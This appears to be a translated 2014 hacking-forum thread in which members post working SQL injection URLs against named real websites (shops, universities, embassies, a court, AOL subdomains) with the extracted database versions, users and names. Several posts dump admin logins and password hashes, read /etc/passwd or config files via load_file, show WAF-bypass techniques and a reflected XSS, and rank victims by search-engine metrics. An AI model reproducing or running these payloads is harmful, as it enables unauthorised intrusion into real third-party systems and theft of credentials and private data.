https://
www.flags.net
/country.php?country=SLVA'+and+1=(if(ascii(mid(vers ion(),1,1))=52,1 ,0))+--+


=================================================

Unknown
07.02.2014, 00:16
Code:
http://www.melbournefineart.com.au/gallery.php?id=-18+union+select+1,version(),3,4,5--

4.1.21-log

YaBtr
07.02.2014, 12:13
www.softinfo.ca


http://
www.softinfo.ca
/en/produits.php?id=20+union+select+'
RUSSIA
'||'
SOCHI
'||'
2014
'+from+rdb$database+--+


=================================================

MaxFast
07.02.2014, 12:36
Code:
http://spa.sochi-zapolyarye.ru/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--

hot_spazapolyary@localhost :: hot_spazapolyarye


Code:
http://sochi-polyana.com/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--

krpol@localhost :: krpol


Code:
http://sochisportservice.com/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--

dom@localhost :: dom


Code:
http://respekt-avia.ru/?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--

respekt@localhost :: respekt

In a word - a CMS full of holes

Unknown
07.02.2014, 16:41
YaBtr said:
=================================================


I just can't find the users table there... Did you work it through to the end yourself or not? If so, tell me where the users are

P.S. Angola Oil Field Supply Services


Code:
http://www.angolaoilfield.com/info.php?info_id=-7+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11,12,13,14,15+--+

4.1.22-log:aoss@localhost:aoss

YaBtr
07.02.2014, 16:59
GhostW said:
I just can't find the users table there... Did you work it through to the end yourself or not? If so, tell me where the users are


We'll communicate through SQL injections

On the question: I looked too, but didn't check all the tables; the site isn't very valuable, so if you find something, good for you

pr: 5


http://
www.legacy-project.org
/index.php?page=event_detail&eventID=10+and+1=2+union+select+1,version(),3,4+--+


=================================================

MaxFast
08.02.2014, 03:06
Code:
http://www.acnielsen.ru/news.php?news_id=-16+union+select+1,concat(user(),0x203a3a20,databas e(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6 e336d31733c2f666f6e743e),3,4,5,6,7--

u140989@10.8.1.203 :: u140989


Code:
http://www.prostor2000.ru/show_cat.php?catid=-13%27+union+select+1,2,3,concat(user(),0x203a3a20, database(),0x203a3a20,0x3c666f6e7420636f6c6f723d72 65643e6e336d31733c2f666f6e743e),5,6,7,8,9+--+

prostor@localhost :: prostor

MaxFast
09.02.2014, 10:09
Code:
http://www.fond.ru/index.php?menu_id=-370+union+select+concat(0x3a,version(),0x3c63656e7 465723e3c696d67207372633d687474703a2f2f666f72756d2 e616e7469636861742e72752f617661746172732f617661746 1723137353937372e6769663e3c2f63656e7465723e)--

5.1.41-log

TIC = 1200, PR = 5

Unknown
09.02.2014, 15:57
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18+--+

5.0.83-community

u1094094_sangha@172.16.5.126


Code:
http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,version%28%29,4,5+--+


5.5.33a-MariaDB

raahauge_cms@raptor13.nextmill.net

Unknown
09.02.2014, 17:48
Greetings to Uzbekistan's Lokomotiv!


Code:
http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--

5.1.68-CLL-LVE

Win32BOT
11.02.2014, 02:55
Code:
http://sorrentosolemare.ru/info.php?info_id=-20+union+select+1,concat_ws(user(),database(),vers ion()),3,4,5,6,7,8+--+

ocheretko
11.02.2014, 07:07
Code:
http://www.lakedirectory.net/page.php?id=2+and+1=0+%20Union%20Select%20%201%20, 2,3,4,5,6,7,8,9,10,11,%20UNHEX(HEX(CONCAT(CHAR(64) ,CHAR(95),CHAR(64),pass,char(59),CHAR(64),CHAR(95) ,CHAR(64))))%20+FROM+lgg.pmd_users%20%20LIMIT%201, 1--



Code:
http://www.lakedirectory.net/page.php?id=2+and+1=0+%20Union%20Select%20%201,2,3 ,4,5,6,7,8,9,10,11,%20UNHEX(HEX(CONCAT(0x5B6B65795 D,load_file(0x2F6574632F706173737764),0x5B6B65795D )))%20--

When you follow the link, it redirects to a URL that contains the data output.

DezMond™
11.02.2014, 13:01
PR7

http://www.lebenslanges-lernen.at/erasmus_outgoing/index.php?lng=de&sekt=1&txt=hei&eracode=-SOFIA27'+union+select+user(),2,3,4,5,6,7,8,9,10,11 +--+

kooler
12.02.2014, 23:06
First come, first served)

http://www.hkyongnuo.com/e-detail.php?ID=2888+union+select+1,version(),3,4,5, 6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--

MySQL: 5.5.28

PR: 3

http://www.vrijglas.org/detail.php?id=2110+union+select+1,version(),3,4,5, 6,7,8,9,0,11,12--

MySQL: 5.0.95

PR: 3

Jamsho0T
13.02.2014, 11:56
Code:
http://www.lamarelle.fr/news/news.php?id=9+union+select+1,concat_ws%280x3a,user %28%29,version%28%29,database%28%29%29,concat_ws%2 80x3a,login,passwd%29,4%20FROM%20user+--+

PR 2

5.1.66-0+squeeze1-log

#didn't find the admin panel, or it's /admin/


Code:
http://www.fangemeinschaft.de/news.php?id=-4564564556+UNION+SELECT+1,2,3,4,5,6,7,8,version%28 %29,10,11,12,13,14,15,16

4.1.22-nmm-1-log

PR 3


Code:
http://www.jackculcay.de/news.php?id=120%27+AND+1=0+UNION+SELECT+1,version% 28%29,3,4,5,6,7,8,9,10+--+

5.5.31-log

pr 1

Unknown
15.02.2014, 17:11
College of Agriculture California State University, Chico


Code:
http://-www.chicostatefarmstore.com/product-line.php?ID=-12+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10--

WallHack
16.02.2014, 13:02
2 pr


Code:
http://www.retailtherapy.tv/video.php?id=-163+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+--+

4 pr


Code:
http://www.stagenoise.com/video/video.php?id=-37+union+select+1,version(),3+--+

Улыбайся
16.02.2014, 16:22
http://www.crash-cars.ru/docs_ru.php?id=-7+union+select+1,2,3,4,@@version,6+--+

It was just nice to see your total balance: $29,048.04

http://zxtunes.com/software.php?id=-12%27+union+select+1,2,3,4,@@version,6+--+

WallHack
18.02.2014, 18:41
Yandex TIC 10, Google Page Rank 4


Code:
http://www.heure-exquise.org/video.php?id=-4677+/*!union*/+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+--+

DezMond™
19.02.2014, 11:33
PR5

http://www.flumroc.ch/de/loesungen/list.php?maincat=-4+union+select+1,user(),3,4+--+

WallHack
21.02.2014, 13:15
Yandex TIC 40, Google Page Rank 2


Code:
http://www.worldboxing.ru/view_lessons.php?id=99999999%27+union+select+1,use r(),3+--+

MaxFast
21.02.2014, 20:59
Jews


Code:
http://nameandglory.spb.ru/martirolog.php?&letter=-1'+union+select+concat(user(),0x3a,0x3c666f6e74206 36f6c6f723d7265643e3c623e6e336d31733c2f666f6e743e3 c2f623e)+--+

memorial@localhost

MaxFast
22.02.2014, 10:08
Football club "Агара"


Code:
http://www.agarafc.com.ua/news.php?id=-79+union+select+1,2,3,4,5--

Never did manage to bypass the WAF

Unknown
22.02.2014, 18:55
Code:
http://www.bishopdwenger.com/content.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2--

WallHack
23.02.2014, 09:06
10 TIC 1 PR

Admin login and password


Code:
http://japonavto.ru/newsview.php?id=-10+union+select+1,login,pass,4,5,6+from+admin+--+

Didn't find the admin panel

Athlon
23.02.2014, 23:14
Code:
http://zemkadastr45.ru/?content_type=registration'+or+(select+count(*)fro m(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+group+b y+concat(mid((select+name+from+users+limit+1),1,64 ),floor(rand(0)*2)))+--+

Admin panel, login, password hash

YaBtr
24.02.2014, 09:33
MaxFast said:
Football club "Агара"

Code:
http://www.agarafc.com.ua/news.php?id=-79+union+select+1,2,3,4,5--

Never did manage to bypass the WAF


It can be bypassed like this:


www.agarafc.com.ua/news.php?id=-79+/*!union*/ select* from (select 1)a join(select version())b join(select 3)c join(select 4)d join(select 5)i join(select 6)f+--+g

nemaniak
24.02.2014, 17:27
rapid4me.com File dump site, ~10k traffic


Code:
http://rapid4me.com/?n=-7708' UNION ALL SELECT NULL,concat_ws(0x3a,version(),user(),database()),N ULL,NULL,NULL,NULL,NULL%23



Code:
5.5.28-29.2-log:root@localhost:fileshare_se

k-state.edu PR-7 Alexa-24k TIC-300 ~100k traffic


Code:
http://www.k-state.edu/today/announcement.php?id=-2140'+union+select+concat_ws(0x3a,version(),user() ,database()),2,3,4,5,6,7,8+--+&category=events&referredby=categoryrssfeed



Code:
5.5.13-log:dcm@ome-media2.campus.ksu.edu:dcm

Unknown
24.02.2014, 23:09
Salaam Somali Bank


Code:
http://salaamsombank.com/pages.php?id=-14+union+select+1,2,version(),4,5,6,7,8,9,10--

5.1.68-community-log

Улыбайся
26.02.2014, 00:55
HTML:
http://www.printer13.ru/product_info.php?id=-12+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12 ,13+--+

comynicator
26.02.2014, 15:52
ttp://www.carldavey.co.uk/article.php?id=-1+union+ select+1,group_concat(schema_name),3,4+from+inform ation_schema.sch emata--

WallHack
26.02.2014, 18:54
TIC 650 4 pr


Code:
http://ecom.su/news/index.php?id=-1232+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35+--+

Win32BOT
26.02.2014, 20:06
Code:
http://ecom-info.spb.ru/news/index.php?id=-757+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat_ws(user(),version(),database()),16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

TIC 600

PR 4


==============================


Code:
http://villa-beliv.com/room.php?id=-4+union+select+1,2,3,4,version(),6,user(),8,9,data base()+--+

=============================


Code:
http://vladdepo.ru/buy.php?id=-47+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11+--+&make=show

psihoz26
28.02.2014, 01:26
UltraPrice store. Computers, components, laptops, digital equipment, speaker systems for home theater. Minsk.


Code:
http://www.ultraprice.by/popups/service.php?id=-10+union+select+group_concat(u_name,0x3b,u_passwd) +from+admin_user+limit+0,1+--+

MaxFast
28.02.2014, 20:13
http://img543.imageshack.us/img543/1310/6eqa.png


Code:
http://www.gorod312.ru/press/news/?mode=show&id=-415+union+select+1,2,concat(version(),database(),u ser()),4,5,6,7,8,9,10,11--

5.0.96-loggorod312_rugorod312_ru@zvm30.host.ru

MaxFast
05.03.2014, 02:06
http://novufms.ru/images/logo.jpg


Code:
http://novufms.ru/content.php?id=-14+union+select+1,concat(user(),0x3a,version()),3, 4--

novufms@localhost:5.0.51a-24+lenny5


MUSEUM OF THE AIR DEFENSE FORCES




Code:
http://www.mvpvo.ru/inner.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7,8,9,10,11,12--

u67093@10.8.1.199:5.0.95-log

MaxFast
06.03.2014, 01:36
http://i.imgur.com/dUwa5PU.png


Code:
http://www.chel-oblsud.ru/?html=news&nid=-1328+/*!+and(select+1+from(select+count(*),concat((selec t+(select+concat(version(),0x3a,user()))+from+info rmation_schema.tables+limit+0,1),floor(rand(0)*2)) x+from information_schema.tables+group+by+x)a)*/

5.0.95-log:chel-oblsud@localhost1

Unknown
09.03.2014, 13:18
Code:
http://www.zuppatheatre.com/members.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8,9--

MaxFast
09.03.2014, 14:39
http://i.imgur.com/3oRL07T.png


Code:
http://www.ufmsko.ru/view.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7--

root@localhost:5.0.45

http://i.imgur.com/27gNemX.png


Code:
http://www.ufms72.ru/index.php?catalog=-79'+union+select+1,2,3,concat(version(),0x3a,user( )),5,6,7,8,9,10+--+

5.1.46-log:gb_ufms72@81.177.33.6

AHTNkiller
09.03.2014, 19:05
Help me finish digging into this!

http://avtochast. ru/cardescr.php?carid=874&mod=&typeid=-9563+union+select+1,version%28%29,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53

YaBtr
09.03.2014, 19:24
AHTNkiller said:
Help me finish digging into this!
http://avtochast. ru/cardescr.php?carid=874&mod=&typeid=-9563+union+select+1,version%28%29,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53


There is a dedicated thread: /thread46016.html


union select (select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53+--+

Win32BOT
09.03.2014, 23:54
HTML:
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,concat(version(),0x3a,user()),3 ,4,5,6,7,8,9,10,11+--+

file_priv = Y

TIC (kompromat.flb.ru) 425

TIC (flb.ru) 2700

danil7493
10.03.2014, 17:40
http://www.mhfan.fr/news.php?id=-5+union+select+1,2,3,group_concat(concat_ws(0x3a3a ,pseudo_user,mail_user,mdp_user)),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+use rs+limit+0,20--

danil7493
10.03.2014, 19:17
http://www.autosystem.com.ua/news.php?id=-7+union+select+1,2,3,concat_ws(0x3a3a3a3a,user(),d atabase(),version()),5,6,7,8+--+

autosystem@web5.1.hosting.efort.com.ua::::autosyst em_nissan::::5.1.68-log

psihoz26
11.03.2014, 02:07
proskater.ru - The largest online skate shop in Russia.

TIC 275

PR 3


Code:
POST http://www.proskater.ru/shopping_cart.php?action=update_product
DATA products_id[]=1029188{1}539'+benchmark(20000000,sha1(1))+'&cart_delete[]=1029188{1}539



Code:
Host IP: 89.108.91.9
Web Server: nginx/0.7.65
Powered-by: PHP/5.3.2-1ubuntu4.17
Current DB: db_proskater

You need to be logged in to work it.

Unknowhacker
20.03.2014, 17:06
Magazine "Родина"


Code:
http://www.istrodina.com/rodina_articul.php3?id=3014&n=142+union+select+1,2,version%28%29+--+

Version: 4.0.27-log

Unknown
22.03.2014, 00:27
Arthur C Clarke Institute for Modern Technologies, Katubedda, Moratuwa


Code:
http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--

MaxFast
26.03.2014, 22:44
zipper_frz said:
TIC - 0, PR - 2
http://www.right2lifelanka.org/new/newsview.php?id=138




Code:
http://www.right2lifelanka.org/new/newsview.php?id=-138'+union+select+1,2,concat(user(),database()),4, 5,6,7,8+--+

r2llanka_user@localhostr2llanka_main


RoksHD said:

Code:
http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1%20and%20%201=1


Code:
http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1%20and%20%201=1





Code:
http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user() ,0x3a,database()),5,6,7,8,9,10,11--

legacy_jordan@localhost:legacy_wp


Code:
http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user() ,0x3a,database()),5,6,7,8,9,10,11--

southcrestorg@joro.dreamhost.com:southcrest_org

Unknown
30.03.2014, 17:13
FC Lokomotiv Tashkent


Code:
http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--

Unknown
06.04.2014, 01:39
I couldn't find the name of the affiliate script or the vendor's site, but there are large projects running on identical code:

script: work-task-read.php

parameter: ?adv=

query:


Code:
-158%27 union select 1,2,concat_ws%280x3a,id,username,password%29,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from tb_users+limit+1,1+--+

Requirement: an account in the system.

Live example:

_ttp://mvdbux.ru/work-task-read.php?adv=

-158%27%20union%20select%201,2,concat_ws%280x3a,id, username,password%29,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23%20from%20tb_users+limit+0 ,1+--+

Unknown
06.04.2014, 13:20
Code:
http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--

YaBtr
08.04.2014, 12:50
unic0rn said:

Code:
http://mfc.edu/event.php?id=-16%27+UNION+SELECT+1,concat_ws%280x3e3e,database%2 8%29,user%28%29%29,3,version%28%29,5,6,7,8+--+

DEPARTMENT OF FINANCIAL STUDIES UNIVERSITY OF DELHI, PR4


Someone may find this interesting: there is one more vulnerability here, a reflected XSS:


mfc.edu/event.php?id=-8' union select 1,concat_ws(0x3a,database
%2528
),user()),3,version(),5,6,7,8--
alert(/Antichat/)

Anat
11.04.2014, 09:13
HTML:
http://asia-moto.ru/content.php?id=-19+UNION+SELECT+1--
http://stpatsfc.com/news.php?id=-3045+UNION+SELECT+1--
http://naspschools.org/board/board.php?id=-12+UNION+SELECT+1,2,3,4,5,6,7--
http://grandsoleil.net/boat_shows.php?id=-113+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27--
http://www.udc-caraudio.com/news_detail.php?id=-74+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5--
http://listadotren.es/motor/series.php?id=/51
http://weddingawards.com.br/premiacao/jurado-descritivo.php?id=/17
http://www.couleursetnuances.com/realisation.php?id=-14 order/**/by/**/?--
http://kagakribet.com/humor.php?id=-147+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--

kingbeef
11.04.2014, 18:50
Rambler.ru



Code:
http://easystudy.rambler.ru/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

Anat
12.04.2014, 15:29
HTML:
http://lifelinebatteries.com/distributorpage.php?id=-766+UNION+SELECT+1,2,group_concat(table_name),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+ from+information_schema.tables--
http://absolutehotelservices.com/press.php?id=-89+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5--
http://peshtigotimes.net/index.php?id=-22462+UNION+SELECT+1,2,3,4,5,group_concat(table_na me),7,8,9,10,11,12,13,14+from+information_schema.t ables--
http://elkage.de/src/public/showterms.php?id=-1751+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51--
http://www.gardencentr.ru/content.php?id=-32+UNION+SELECT+1--
http://www.relaisdesvignerons.com/lire_news.php?id=-36+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://kotis.org/printer.php?id=-137+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
http://www.sulapdiyan.com/sulap.php?id=-69+UNION+SELECT+1,2,group_concat(table_name),4+fro m+information_schema.tables--
http://senesco.com/newsitem.php?id=-291+UNION+SELECT+1,2,3,group_concat(table_name),5+ from+information_schema.tables--
http://asaravillaanAdsuite.com/templatelink.php?id=-39+UNION SELECT+1,2,group_concat(table_name),4,5,6,7,8,9,10 +from+information_schema.tables--
http://asaravillaandsuite.com/templatelink.php?id=-39+UNION%20SELECT+1,2,group_concat(table_name),4,5 ,6,7,8,9,10+from+information_schema.tables--

Unknowhacker
14.04.2014, 11:08
Stroika.md


Code:
http://www.stroika.md/detail.php?id=1960+union+select+1,version%28%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29+--+

Version: 5.1.72-2

TIC: 40

PR: 3/10

Unknowhacker
20.04.2014, 17:31
Code:
http://hottey.com.ua/a_podarki_prikoly/f_cat/?vtype=big&id_big=1571+union+select+1,version%28%29,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+--+&page1=1

Version: 5.1.73-1-log

WallHack
24.04.2014, 18:52
Yandex TIC 100, Google Page Rank 4


Code:
http://usovi.ru/index.php?page=news_details&news_id=-10%27+union+select+1,2,3,4,5,6,7,8,9,10+--+

WallHack
26.04.2014, 19:03
Yandex TIC 10, Google Page Rank 1

Game server monitoring


Code:
http://www.gamesmonitoring.ru/index.php?page=view&id=-339%27+union+select+1,2,3,4,version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18+--+

Unknown
29.04.2014, 00:35
Code:
http://pcidatabase.com/vendor_details.php?id=606-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15--
http://redwheelweiser.com/p.php?id=35-999.9+union+select+1,2,3,4,5,6,7,8,9--
http://iop.vast.ac.vn/theor/vtps/news.php?id=2-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--
http://yccd.am/picture.php?id=85-999.9+union+select+1,2,3,4,5,6--
http://bbtv.az/ru/show.img.php?id=218-999.9+union+select+1,2,3,4,5,6,7,8,9,10--
http://kms.bg/en/news.php?news_id=24-999.9+union+select+1,2,3,4,5,6--

look2009
07.05.2014, 01:09
Code:
http://www.npfpol.ru/cat.php?f=172+UNION+SELECT+1,2,database(),version( ),5,6,user()+--+

4.0.27-log

npfpol10_poly

npfpol10_poly@217.112.37.2

look2009
08.05.2014, 16:45
Code:
http://www.putridflowers.com/music.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1 1,12,group_concat(concat_ws(0x3a3a%20,loginid,pass word)),14,15,16,17+FROM+pf_admin+--+

Unknown
09.05.2014, 11:59
Code:
http://www.cronograf.md/home.php?id=-8+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4--

BLurpi^_^
09.05.2014, 15:47
pr: 6

alexa

danil7493
10.05.2014, 10:30
http://www.denysvonarend.com/en/hotel.php?id=-94+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11+--

5.0.96-log:denys@81.171.239.161:denys

BLurpi^_^
11.05.2014, 02:19
http://counter.pr-cy.ru/prcy/www.zolotoy-grad.ru


Code:
http://www.zolotoy-grad.ru/en/page.php
?m_id=999999.9' union all select 1,2,concat(0x7e,0x27,unhex(Hex(cast(user() as char))),0x27,0x7e),4,5 and 'x'='x

psihoz26
12.05.2014, 11:35
And here's what I found almost a year ago


Code:
http://richmedia.aol.com/page1.php/images/demopopup.php?pageid=26&latest=0&s_term=&random=150'
MySQL blind inj



Code:
http://gw-moviefone-dtc02.evip.aol.com/movies/pox/closestshowtimes.xml?zip=00501&id=23765
MySQL blind inj

And this one I worked out not through the usual Havij


Code:
http://richmedia.aol.com/demopopup.php?id=12771+Union+select+1,2,3,user(),5 ,6,7,8,9,10,11,12,13,14,15+--+

WallHack
18.05.2014, 10:50
Museum of the Air Defense Forces


Code:
http://www.mvpvo.ru/inner.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

Yandex TIC 90

Yandex Catalog: Yes

Google Page Rank 3/10

DMOZ.org catalog: Yes

Zen1T21
20.05.2014, 23:24
Bicycle sales site, books


1)http://www.veloolimp.ru/item.php
POST:
1 union select 1,2,3,4,user(),6,7,8,9,10#
2)http://www.knigi.ru/index.php?action=iffind
POST:
1' union select 1,2,3,user(),5,6,7,8,9#

Unknown
24.05.2014, 13:45
Embassy of India, Belgium


Code:
http://www.indembassy.be/pages.php?id=-22+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12 ,13--

5.0.95

palec2006
01.06.2014, 05:41
HTML:
http://www.rumahfiqih.com/x.php?id=-1+union+select+1,2,3,4,(select+concat(username,0x3 A,password,0x3A,email,0x3A,level)+from+users+limit +0,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24--

kingbeef
01.06.2014, 10:53
Code:
http://spenserians.cath.vt.edu/TextRecord.php?textsid=34360+and+0+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18, 19--+g

Unknown
02.06.2014, 22:53
Code:
http://www.indianembassy.at/pages.php?id=-18+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16--

5.0.83-community

Unknown
10.06.2014, 00:03
Code:
http://www.ginosaladini.it/news/leggi.php?id=-74+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--

DeepBlue7
16.06.2014, 02:32
Code:
http://www.nash.lv/index.php?lang=concat_ws(0x2f,version(),database,u ser())

Unknown
16.06.2014, 23:13
Code:
http://www.business-jet.ru/new/news.php?id=-656+union+select+1,database(),3,version(),5,6--

Anyone want some planes?

palec2006
18.06.2014, 19:10
http://www.powerled.ru/pages/id/-1+union+select+1,2,3,4,5,6,7,(select+concat(0x277E ,username,0x3A3A,password,0x7E27)+from+`u38661_neo n`.modx_manager_users+limit+0,1)+,9,10,11,12,13,14--


5.5.28-log

e-neon.ru:TIC:300R:3

irtgest
18.06.2014, 20:56
http://www.hts.kharkov.ua/news_full.php?id=-1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT_WS(':',status,email,password) FROM `tabadminusers` LIMIT 0,1)%23


Municipal enterprise "Kharkiv Heating Networks"

psihoz26
18.06.2014, 21:19
Code:
http://fontanela.geniuz.cz/page.php?lng=en&id_book=-1+union+select+concat('smotri%20ishodnik',load_fil e(0x573a5c2e576562526f6f745c67656e69757a2e637a5c66 6f6e74616e656c615c696e635f636f6e6e6563742e706870)) ,2,3+--+

Unknown
21.06.2014, 12:23
Code:
http://voentv.mil.by/company.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4--



Code:
http://evreux.catholique.fr/annuaire.php?idpers=-1636+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,concat_ws(0x3a,version(),user() ,database()),22,23,24--

psihoz26
23.06.2014, 18:56
And AOL again


Code:
http://ariannaonline-huffpost-ewr.evip.aol.com/columns/column.php?id=-345+union+select+1,database(),user(),4,version()+--+

OxoTnik
23.06.2014, 20:12
http://www.jh-inst.cas.cz/www/dokument.php?p=-24+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12 ,13,14,15,16,17,18,19

Unknown
23.06.2014, 22:58
_ttp://my.ukrtelecom.ua/ua/login_login_groovy/dfg'AND(extractvalue(1,concat(0x3a,(select(@@versi on)))))='1

Ereee
30.06.2014, 20:06
http://www.post[nogoogle]roi.ru/postform/?nproj=q-020-2d'or+1+group+by+concat((select+version()), floor(rand(0)*2))+having+min(0)--+a

XAMEHA
10.07.2014, 18:15
If you post links, please state the DBMS name and its version in the post.

OxoTnik
15.07.2014, 22:35
http://myanmardailypost.com/issue_type.php?issue=-10+union+select+1,2,3,4,5,6,version(),8,9,database (),user(),12,13,14,15,16--

databasemyanmard_user

mysql 5.5.37

Unknown
19.07.2014, 15:23
Code:
http://leochat.mobi/chatroom.php?id=-29+union+select+@@version--

5.5.35-0+wheezy1

psihoz26
23.07.2014, 20:40
User()=root@localhost

Version()=5.5.31-0+wheezy1


Code:
http://studio-n.by/catalog/item/89)or(ExtractValue(1,concat(0x3a,(mid(load_file(0x 2f6574632f706173737764),1,10))))

Unknown
23.07.2014, 22:29
Code:
http://www.firagirona.com/participant.php?id=108&cl=-5634+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5,6,7,8,9,10,11,12,13--



Code:
5.0.51a-24+lenny5-log:firagirona@localhost:firagirona

MaxFast
23.07.2014, 23:28
Code:
http://www.skyline72.ru/gallery.php?id=-3+union+select+1,concat(version(),0x3a,user()),3,4--



Code:
5.1.66-LOG:HOST1222787@LOCALHOST

psihoz26
24.07.2014, 20:18
Code:
http://www.musiq1.tv/index.php?site=newsky&vid=-2128%20UNION%20SELECT%201,2,3,4,(select(@x)from(se lect(@x:=0x00),(select(0)from(information_schema.c olumns)where(table_schema!=0x696e66f76d6174496f6e5 f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e ,table_schema,0x2e,table_name,0x3a,column_name)))) x),6,7,8,9,10,11,12,13,14--

psihoz26
24.07.2014, 20:54
Code:
http://www.sostrader.it/sostrader/comunicati_show.cfm?id=-854+union+select+1,2,3,user(),5,6,7,8,9,10,11,12

PS Anyone who can't upload is a loser

MaxFast
26.07.2014, 10:35
Code:
http://uni-dance.ru/news.php?id=-86+union+select+1,2,3,concat(version(),0x3a,user() )--



Code:
4.1.25-log:unidance@fe9.hc.ru

speed21
31.07.2014, 11:19
Code:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion()),6,7,8,9,0,1,2--+f



Code:
host1222787_site:5.1.66-log

My first one

DezMond™
11.08.2014, 00:10
